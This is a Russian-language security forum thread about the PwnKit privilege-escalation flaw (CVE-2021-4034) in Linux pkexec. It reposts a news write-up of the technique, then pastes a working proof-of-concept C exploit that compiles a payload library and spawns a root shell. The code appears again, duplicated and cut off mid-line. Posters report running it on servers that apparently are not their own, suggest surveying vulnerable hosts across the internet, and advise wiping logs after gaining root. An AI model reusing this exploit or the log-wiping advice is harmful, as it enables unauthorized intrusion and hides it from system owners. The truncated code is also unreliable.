ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
26.01.2022, 14:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
169212
Репутация:
441
|
|
This vulnerability is an attacker's dream come true
Оригинал:
https://www.openwall.com/lists/oss-s.../2022/01/25/11
Эксплоит:
https://github.com/berdav/CVE-2021-4034
.SpoilerTarget" type="button">Spoiler: Подробности
Компания Qualys выявила уявзвимость ( CVE-2021-4034) в системном компоненте Polkit (бывший PolicyKit), используемом в дистрибутивах для организации выполнения непривилегированными пользователями действий, требующих повышенных прав доступа. Уязвимость позволяет непривилегированному локальному пользователю повысить свои привилегии до пользователя root и получить полный контроль за системой. Проблема получила кодовое имя PwnKit и примечательная подготовкой рабочего эксплоита, работающего в конфигурации по умолчанию в большинстве дистрибутивов Linux.
Проблема присутствует во входящей в состав PolKit утилите pkexec, поставляемой с флагом SUID root и предназначенной для запуска команд с привилегиями другого пользователя в соответствии с заданными правилами PolKit. Из-за некорректной обработки передаваемых в pkexec аргументов командной строки непривилегированный пользователь мог обойти аутентификацию и добиться запуска своего кода с правами root, независимо от установленных правил доступа. Для атаки не важно какие настройки и ограничения в PolKit заданы, достаточно чтобы для исполняемого файла с утилитой pkexec был выставлен признак SUID root.
Pkexec не проверяет корректность счётчика аргументов командной строки (argc), передаваемых при запуске процесса. Разработчиками pkexec подразумевалось, что первая запись массива argv всегда содержит имя процесса (pkexec), а вторая либо значение NULL, либо имя запускаемой через pkexec команды. Так как счётчик аргументов не проверялся на соответствие фактическому содержимому массива и полагалось, что он всегда больше 1, в случае передачи процессу пустого массива argv, что допускает функция execve в Linux, pkexec воспринимал значение NULL как первый аргумент (имя процесса), а следующую за пределами буфера память, как далее идущее содержимое массива.
|---------+---------+-----+------------|---------+---------+-----+------------|
| argv[0] | argv[1] | ... | argv[argc] | envp[0] | envp[1] | ... | envp[envc] |
|----|----+----|----+-----+-----|------|----|----+----|----+-----+-----|------|
V V V V V V
"program" "-option" NULL "value" "PATH=name" NULL
Проблема в том, что следом за массивом argv в памяти размещается массив envp, содержащий переменные окружения. Таким образом, при пустом массиве argv, pkexec извлекает данные о запускаемой с повышенными привилегиями команде из первого элемента массива с переменными окружения (argv[1] становился идентичен envp[0]), содержимое которого может контролировать атакующий.
Получив значение argv[1], pkexec пытается с учётом файловых путей в PATH определить полный путь к исполняемому файлу и записать указатель на строку с полный путём обратно в argv[1], что приведёт к перезаписи и значения первой переменной окружения, так как argv[1] идентичен envp[0]. Через манипуляцию с именем первой переменной окружения, атакующий может осуществить подстановку другой переменной окружения в pkexec, например, подставить переменную окружения "LD_PRELOAD", которая недопускается в suid-программах, и организовать загрузку в процесс своей разделяемой библиотеки.
В рабочем эксплоите осуществляется подстановка переменной GCONV_PATH, которая используется для определения пути к библиотеке перекодирования символов, динамически загружаемой при вызове функции g_printerr(), в коде которой используется iconv_open(). Переопределив путь в GCONV_PATH атакующий может добиться загрузки не штатной библиотеки iconv, а своей библиотеки, обработчики из которой будут выполнены во время вывода сообщения об ошибке на стадии, когда pkexec ещё выполняется с правами root и до проверки полномочий запуска.
Отмечается, что несмотря на то, что проблема вызвана повреждением памяти, она может надёжно и повторяемо эксплуатироваться независимо от используемой аппаратной архитектуры. Подготовленный эксплоит успешно протестирован в Ubuntu, Debian, Fedora и CentOS, но может быть использован и в других дистрибутивах. Оригинальный эксплоит пока не доступен публично, что утверждается, что он является тривиальным и может быть легко воссоздан другими исследователями, поэтому на многопользовательских системах важно как можно скорее установить обновление с исправлением. Polkit также доступен для BSD-систем и Solaris, но изучение возможности эксплуатации в них не производилось. Известно только то, что атака не может быть осуществлена в OpenBSD, так как ядро OpenBSD не допускает передачу при вызове execve() нулевого значения argc.
Проблема присутствует с мая 2009 года, со времени добавления команды pkexec. Исправление уявзимости в PolKit пока доступно в виде патча (корректирующий выпуск не сформирован), но так как разработчики дистрибутивов были заранее уведомлены о проблеме, большинство дистрибутивов опубликовало обновление одновременно с раскрытием информации об уязвимости. Проблема устранена в RHEL 6/7/8, Debian, Ubuntu, openSUSE, SUSE, Fedora, ALT Linux, ROSA, Gentoo и Arch Linux. В качестве временной меры для блокирования уязвимости можно убрать флаг SUID root с программы /usr/bin/pkexec ("chmod 0755 /usr/bin/pkexec").
https://www.opennet.ru/opennews/art.shtml?num=56580
|
|
|
|
26.01.2022, 23:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
70303
Репутация:
145
|
|
Сообщение от crlf
crlf said:
↑
This vulnerability is an attacker's dream come true
Оригинал:
https://www.openwall.com/lists/oss-s.../2022/01/25/11
Эксплоит:
https://github.com/berdav/CVE-2021-4034
Spoiler: Подробности
Компания Qualys
выявила
уявзвимость
(
CVE-2021-4034
) в системном компоненте Polkit (бывший PolicyKit), используемом в дистрибутивах для организации выполнения непривилегированными пользователями действий, требующих повышенных прав доступа. Уязвимость позволяет непривилегированному локальному пользователю повысить свои привилегии до пользователя root и получить полный контроль за системой. Проблема получила кодовое имя PwnKit и примечательная подготовкой рабочего эксплоита, работающего в конфигурации по умолчанию в большинстве дистрибутивов Linux.
Проблема присутствует во входящей в состав PolKit утилите pkexec, поставляемой с флагом SUID root и предназначенной для запуска команд с привилегиями другого пользователя в соответствии с заданными правилами PolKit. Из-за некорректной обработки передаваемых в pkexec аргументов командной строки непривилегированный пользователь мог обойти аутентификацию и добиться запуска своего кода с правами root, независимо от установленных правил доступа. Для атаки не важно какие настройки и ограничения в PolKit заданы, достаточно чтобы для исполняемого файла с утилитой pkexec был выставлен признак SUID root.
Pkexec не проверяет корректность счётчика аргументов командной строки (argc), передаваемых при запуске процесса. Разработчиками pkexec подразумевалось, что первая запись массива argv всегда содержит имя процесса (pkexec), а вторая либо значение NULL, либо имя запускаемой через pkexec команды. Так как счётчик аргументов не проверялся на соответствие фактическому содержимому массива и полагалось, что он всегда больше 1, в случае передачи процессу пустого массива argv, что допускает функция
execve
в Linux, pkexec воспринимал значение NULL как первый аргумент (имя процесса), а следующую за пределами буфера память, как далее идущее содержимое массива.
|---------+---------+-----+------------|---------+---------+-----+------------|
| argv[0] | argv[1] | ... | argv[argc] | envp[0] | envp[1] | ... | envp[envc] |
|----|----+----|----+-----+-----|------|----|----+----|----+-----+-----|------|
V V V V V V
"program" "-option" NULL "value" "PATH=name" NULL
Проблема в том, что следом за массивом argv в памяти размещается массив envp, содержащий переменные окружения. Таким образом, при пустом массиве argv, pkexec извлекает данные о запускаемой с повышенными привилегиями команде из первого элемента массива с переменными окружения (argv[1] становился идентичен envp[0]), содержимое которого может контролировать атакующий.
Получив значение argv[1], pkexec пытается с учётом файловых путей в PATH определить полный путь к исполняемому файлу и записать указатель на строку с полный путём обратно в argv[1], что приведёт к перезаписи и значения первой переменной окружения, так как argv[1] идентичен envp[0]. Через манипуляцию с именем первой переменной окружения, атакующий может осуществить подстановку другой переменной окружения в pkexec, например, подставить переменную окружения "LD_PRELOAD", которая недопускается в suid-программах, и организовать загрузку в процесс своей разделяемой библиотеки.
В рабочем эксплоите осуществляется подстановка переменной GCONV_PATH, которая используется для определения пути к библиотеке перекодирования символов, динамически загружаемой при вызове функции g_printerr(), в коде которой используется iconv_open(). Переопределив путь в GCONV_PATH атакующий может добиться загрузки не штатной библиотеки iconv, а своей библиотеки, обработчики из которой будут выполнены во время вывода сообщения об ошибке на стадии, когда pkexec ещё выполняется с правами root и до проверки полномочий запуска.
Отмечается, что несмотря на то, что проблема вызвана повреждением памяти, она может надёжно и повторяемо эксплуатироваться независимо от используемой аппаратной архитектуры. Подготовленный эксплоит успешно протестирован в Ubuntu, Debian, Fedora и CentOS, но может быть использован и в других дистрибутивах. Оригинальный эксплоит пока не доступен публично, что утверждается, что он является тривиальным и может быть легко воссоздан другими исследователями, поэтому на многопользовательских системах важно как можно скорее установить обновление с исправлением. Polkit также доступен для BSD-систем и Solaris, но изучение возможности эксплуатации в них не производилось. Известно только то, что атака не может быть осуществлена в OpenBSD, так как ядро OpenBSD не допускает передачу при вызове execve() нулевого значения argc.
Проблема присутствует с мая 2009 года, со времени
добавления
команды pkexec. Исправление уявзимости в PolKit пока доступно в виде
патча
(корректирующий выпуск
не сформирован
), но так как разработчики дистрибутивов были заранее уведомлены о проблеме, большинство дистрибутивов опубликовало обновление одновременно с раскрытием информации об уязвимости. Проблема устранена в
RHEL 6/7/8
,
Debian
,
Ubuntu
,
openSUSE
,
SUSE
,
Fedora
,
ALT Linux
,
ROSA
,
Gentoo
и
Arch Linux
. В качестве временной меры для блокирования уязвимости можно убрать флаг SUID root с программы /usr/bin/pkexec ("chmod 0755 /usr/bin/pkexec").
https://www.opennet.ru/opennews/art.shtml?num=56580Легкий способ набить очков на htb)
|
|
|
|
26.01.2022, 23:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
76692
Репутация:
138
|
|
Или серьезная проблема в инете.
Там, где раньше был просто шелл, сегодня может быть рут.
По-хорошему, надо бы собрать статистику уязвимых систем, пока бага жива.
Толи бага, толи бекдор (как справедливо заметил crlf), интрига есть, возможно позже появятся подробности.
|
|
|
|
27.01.2022, 05:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
44130
Репутация:
26
|
|
Сообщение от dooble
dooble said:
↑
Или серьезная проблема в инете.
Там, где раньше был просто шелл, сегодня может быть рут.
По-хорошему, надо бы собрать статистику уязвимых систем, пока бага жива.
Толи бага, толи бекдор (как справедливо заметил crlf), интрига есть, возможно позже появятся подробности. pkexec довольно редко встречается на веб серверах.
Пока нигде не сработало кроме своей виртуалки
Видимо нужны "особые условия"
|
|
|
|
27.01.2022, 08:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
76692
Репутация:
138
|
|
Сообщение от Ravenous
Ravenous said:
↑
pkexec довольно редко встречается на веб серверах.
Пока нигде не сработало кроме своей виртуалки
Видимо нужны "особые условия" У меня другие результаты, на доступных серверах - сработало везде (где есть pkexec), на debian, ubuntu, centos.
Проверял этим.
И патчил.
.SpoilerTarget" type="button">Spoiler: test
[CODE]
Code:
/*
* blasty-vs-pkexec.c -- by blasty
* ------------------------------------------------
* PoC for CVE-2021-4034, shout out to Qualys
*
* ctf quality exploit
*
* bla bla irresponsible disclosure
*
* -- blasty // 2022-01-25
*/
#include
#include
#include
#include
#include
#include
#include
void fatal(char *f) {
perror(f);
exit(-1);
}
void compile_so() {
FILE *f = fopen("payload.c", "wb");
if (f == NULL) {
fatal("fopen");
}
char so_code[]=
"#include \n"
"#include \n"
"#include \n"
"void gconv() {\n"
" return;\n"
"}\n"
"void gconv_init() {\n"
" setuid(0); seteuid(0); setgid(0); setegid(0);\n"
" static char *a_argv[] = { \"sh\", NULL };\n"
" static char *a_envp[] = { \"PATH=/bin:/usr/bin:/sbin\", NULL };\n"
" execve(\"/bin/sh\", a_argv, a_envp);\n"
" exit(0);\n"
"}\n";
fwrite(so_code, strlen(so_code), 1, f);
fclose(f);
system("gcc -o payload.so -shared -fPIC payload.c");
}
int main(int argc, char *argv[]) {
struct stat st;
char *a_argv[]={ NULL };
char *a_envp[]={
"lol",
"PATH=GCONV_PATH=.",
"LC_MESSAGES=en_US.UTF-8",
"XAUTHORITY=../LOL",
NULL
};
printf("[~] compile helper..\n");
compile_so();
if (stat("GCONV_PATH=.", &st)
Но интересует картина в целом по инету.
|
|
|
|
27.01.2022, 12:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
169212
Репутация:
441
|
|
Сообщение от Ravenous
Ravenous said:
↑
pkexec довольно редко встречается на веб серверах. "довольно редко встречается", без соответствующего подтверждения пруфами, мягко говоря, излишне категоричное заявление Думается процентое соотношение на 1к хостов был бы вполне репрезентативно, тем более, что хватит простого which pkexec.
Сделает кто? С меня +10 репы
|
|
|
|
27.01.2022, 13:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
44130
Репутация:
26
|
|
[QUOTE="dooble"]
dooble said:
↑
У меня другие результаты, на доступных серверах - сработало везде (где есть pkexec), на debian, ubuntu, centos.
Проверял
этим
.
И патчил.
Spoiler: test
[CODE]
Code:
/*
* blasty-vs-pkexec.c -- by blasty
* ------------------------------------------------
* PoC for CVE-2021-4034, shout out to Qualys
*
* ctf quality exploit
*
* bla bla irresponsible disclosure
*
* -- blasty // 2022-01-25
*/
#include
#include
#include
#include
#include
#include
#include
void fatal(char *f) {
perror(f);
exit(-1);
}
void compile_so() {
FILE *f = fopen("payload.c", "wb");
if (f == NULL) {
fatal("fopen");
}
char so_code[]=
"#include \n"
"#include \n"
"#include \n"
"void gconv() {\n"
" return;\n"
"}\n"
"void gconv_init() {\n"
" setuid(0); seteuid(0); setgid(0); setegid(0);\n"
" static char *a_argv[] = { \"sh\", NULL };\n"
" static char *a_envp[] = { \"PATH=/bin:/usr/bin:/sbin\", NULL };\n"
" execve(\"/bin/sh\", a_argv, a_envp);\n"
" exit(0);\n"
"}\n";
fwrite(so_code, strlen(so_code), 1, f);
fclose(f);
system("gcc -o payload.so -shared -fPIC payload.c");
}
int main(int argc, char *argv[]) {
struct stat st;
char *a_argv[]={ NULL };
char *a_envp[]={
"lol",
"PATH=GCONV_PATH=.",
"LC_MESSAGES=en_US.UTF-8",
"XAUTHORITY=../LOL",
NULL
};
printf("[~] compile helper..\n");
compile_so();
if (stat("GCONV_PATH=.", &st)
* ------------------------------------------------
* PoC for CVE-2021-4034, shout out to Qualys
*
* ctf quality exploit
*
* bla bla irresponsible disclosure
*
* -- blasty // 2022-01-25
*/
#include
#include
#include
#include
#include
#include
#include
void fatal(char *f) {
perror(f);
exit(-1);
}
void compile_so() {
FILE *f = fopen("payload.c", "wb");
if (f == NULL) {
fatal("fopen");
}
char so_code[]=
"#include \n"
"#include \n"
"#include \n"
"void gconv() {\n"
" return;\n"
"}\n"
"void gconv_init() {\n"
" setuid(0); seteuid(0); setgid(0); setegid(0);\n"
" static char *a_argv[] = { \"sh\", NULL };\n"
" static char *a_envp[] = { \"PATH=/bin:/usr/bin:/sbin\", NULL };\n"
" execve(\"/bin/sh\", a_argv, a_envp);\n"
" exit(0);\n"
"}\n";
fwrite(so_code, strlen(so_code), 1, f);
fclose(f);
system("gcc -o payload.so -shared -fPIC payload.c");
}
int main(int argc, char *argv[]) {
struct stat st;
char *a_argv[]={ NULL };
char *a_envp[]={
"lol",
"PATH=GCONV_PATH=.",
"LC_MESSAGES=en_US.UTF-8",
"XAUTHORITY=../LOL",
NULL
};
printf("[~] compile helper..\n");
compile_so();
if (stat("GCONV_PATH=.", &st) |
|
|
|
27.01.2022, 13:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
295690
Репутация:
24
|
|
Можно просто у себя чекнуть.
У меня не сработала магия Несколько разных пробовал чисто на всякий случай.
Я недавно обновлялся...
А вот мобилу-бы да, надо проверить.
UPD: юзать на чужих тачках может быть не очень круто. Ибо оно в логах гадит вроде-как.
|
|
|
|
27.01.2022, 16:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
169212
Репутация:
441
|
|
Сообщение от DartPhoenix
DartPhoenix said:
↑
Я недавно обновлялся... Да, именно так и выглядит пропатченный вариант. Если посмотреть сорцы, то там добавили проверку аргумента, в оригинале, флоу летел дальше.
Сообщение от DartPhoenix
DartPhoenix said:
↑
А вот мобилу-бы да, надо проверить. Если мобила на андроиде, вангую там pkexec-ом и не пахнет.
Сообщение от DartPhoenix
DartPhoenix said:
↑
UPD: юзать на чужих тачках может быть не очень круто. Ибо оно в логах гадит вроде-как. Так после рута, как правило, логи нужно в обязательном порядке ванишить чистить
|
|
|
|
27.01.2022, 16:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
295690
Репутация:
24
|
|
Сообщение от crlf
crlf said:
↑
Если мобила на андроиде, вангую там pkexec-ом и не пахнет. Угу. По умолчанию sudo тоже отсуствует. Надо попробовать порутать его и посмотреть.
Может они ставят.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
